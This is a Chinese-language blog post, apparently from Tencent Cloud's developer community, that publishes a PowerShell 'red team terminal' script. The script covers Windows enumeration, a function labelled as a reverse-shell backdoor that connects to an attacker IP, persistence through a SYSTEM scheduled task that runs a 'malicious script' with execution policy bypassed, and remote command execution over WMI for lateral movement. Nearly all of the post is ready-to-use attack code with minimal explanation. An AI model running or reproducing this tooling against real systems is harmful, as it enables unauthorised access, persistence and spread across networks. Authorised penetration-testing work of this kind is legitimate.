红队终端:高级系统枚举与权限提升工具详解
原创
红队终端:高级系统枚举与权限提升工具详解
原创
qife122
发布于 2025-08-23 14:57:55
发布于 2025-08-23 14:57:55
redteam_terminal.ps1
作者: Gerard King
描述: 面向一级红队操作员的高级终端程序,用于系统枚举、权限提升和持久化控制。
使用场景: 渗透测试人员和红队操作员在Windows环境中进行对抗演练。
标签: PowerShell, 红队, 渗透测试, 枚举, 权限提升, 持久化
系统信息收集函数
function Get-SystemInfo {
$os = Get-CimInstance -ClassName Win32_OperatingSystem
$cpu = Get-CimInstance -ClassName Win32_Processor
$services = Get-Service
$users = Get-WmiObject -Class Win32_UserAccount
Write-Host "`n[+] 系统信息:"
Write-Host "操作系统: $($os.Caption) | 版本: $($os.Version)"
Write-Host "CPU: $($cpu.Name)"
Write-Host "`n[+] 系统用户:"
$users | ForEach-Object { Write-Host "用户: $($_.Name) | 域: $($_.Domain)" }
Write-Host "`n[+] 运行中的服务:"
$services | Select-Object Name, Status | Format-Table
}网络端口扫描函数
function Scan-Network {
Write-Host "`n[+] 网络扫描(开放端口):"
$netstat = netstat -an | Select-String "LISTENING"
$netstat | ForEach-Object { Write-Host $_.Line }
}权限提升检测函数
function Priv-EscalationCheck {
Write-Host "`n[+] 权限提升检查(不安全权限):"
$vulnerableDirs = @(
"C:\Program Files",
"C:\Windows\System32",
"C:\Users\Public"
)
foreach ($dir in $vulnerableDirs) {
Write-Host "`n检查目录: $dir"
Get-Acl $dir | Select-Object Path, Access
}
}反向Shell后门函数
function Start-ReverseShell {
param (
[string]$ip,
[int]$port
)
Write-Host "`n[+] 启动反向Shell连接到 ${ip}:${port}"
$reverseShell = New-Object System.Net.Sockets.TcpClient($ip, $port)
$stream = $reverseShell.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$reader = New-Object System.IO.StreamReader($stream)
while ($true) {
$command = Read-Host "Shell命令"
if ($command -eq "exit") {
$writer.WriteLine("exit")
$writer.Flush()
break
}
$writer.WriteLine($command)
$writer.Flush()
$response = $reader.ReadLine()
Write-Host $response
}
$reader.Close()
$writer.Close()
$reverseShell.Close()
}持久化机制设置函数
function Set-Persistence {
Write-Host "`n[+] 设置持久化(计划任务)"
$taskName = "RedTeamPersistence"
$taskAction = "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Your\MaliciousScript.ps1"
$taskTrigger = New-ScheduledTaskTrigger -AtStartup
$taskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument $taskAction
Register-ScheduledTask -Action $taskAction -Trigger $taskTrigger -TaskName $taskName -User "NT AUTHORITY\SYSTEM"
Write-Host "[+] 通过计划任务安装持久化机制: $taskName"
}横向移动函数
function Lateral-Movement {
param (
[string]$targetIp,
[string]$command
)
Write-Host "`n[+] 向 ${targetIp} 发起横向移动"
Invoke-WmiMethod -ComputerName $targetIp -Class Win32_Process -Name Create -ArgumentList $command
Write-Host "[+] 在 ${targetIp} 上执行的命令: ${command}"
}主终端交互函数
function Start-RedTeamTerminal {
Clear-Host
Write-Host "[+] 欢迎使用红队终端。准备接收命令。"
Write-Host "[+] 输入 'exit' 退出或 'help' 查看可用命令。"
while ($true) {
$input = Read-Host "输入命令"
switch ($input.ToLower()) {
'sysinfo' { Get-SystemInfo }
'network' { Scan-Network }
'priv' { Priv-EscalationCheck }
'rev' {
$ip = Read-Host "输入攻击者IP"
$port = Read-Host "输入端口"
Start-ReverseShell -ip $ip -port $port
}
'persistence' { Set-Persistence }
'lateral' {
$targetIp = Read-Host "输入目标IP"
$command = Read-Host "输入要执行的命令"
Lateral-Movement -targetIp $targetIp -command $command
}
'exit' { Write-Host "[+] 退出红队终端。"; break }
'help' {
Write-Host "`n[+] 可用命令:"
Write-Host "'sysinfo' - 显示系统信息"
Write-Host "'network' - 扫描开放端口"
Write-Host "'priv' - 检查权限提升机会"
Write-Host "'rev' - 启动反向Shell后门"
Write-Host "'persistence' - 通过计划任务设置持久化"
Write-Host "'lateral' - 通过横向移动远程执行命令"
Write-Host "'exit' - 退出终端"
}
default { Write-Host "[+] 无效命令。输入 'help' 查看可用命令。" }
}
}
}
# 启动红队终端
Start-RedTeamTerminal
# 关闭前暂停
Read-Host "按Enter退出..."原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
